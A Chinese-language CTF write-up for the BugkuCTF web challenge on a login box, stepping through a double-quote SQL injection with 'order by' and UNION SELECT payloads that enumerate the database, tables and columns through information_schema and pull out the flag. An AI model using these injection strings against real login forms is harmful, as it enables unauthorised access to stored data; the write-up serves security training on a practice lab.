1. 程式人生 > >BugkuCTF之web題之這是一個神奇的登陸框

BugkuCTF之web題之這是一個神奇的登陸框

BugkuCTF之web題之這是一個神奇的登陸框

開啟網頁之後發現:
在這裡插入圖片描述
隨便輸入賬號和密碼出現:
在這裡插入圖片描述
那就開始尋找注入點吧,輸入0’發現還是:
在這裡插入圖片描述
輸入0" 發現報錯:
在這裡插入圖片描述
確定可以注入,判斷欄位有多少個 0"order by 1,2,3# 發現:
在這裡插入圖片描述
說明有兩列。

輸入 0" union select database(),2# ,得到庫名:
在這裡插入圖片描述
繼續輸入 0" union select table_name,2 from information_schema.tables where table_schema=‘bugkusql1’ # 得到表名:
在這裡插入圖片描述
繼續輸入 0" union select column_name,2 from information_schema.columns where table_name=‘flag1’ #

得到列名:
在這裡插入圖片描述
繼續輸入 0" union select flag1,2 from flag1# 得到該列下的值:
在這裡插入圖片描述
看起來挺像flag的,那麼提交一下吧,發現這個真的是flag!!!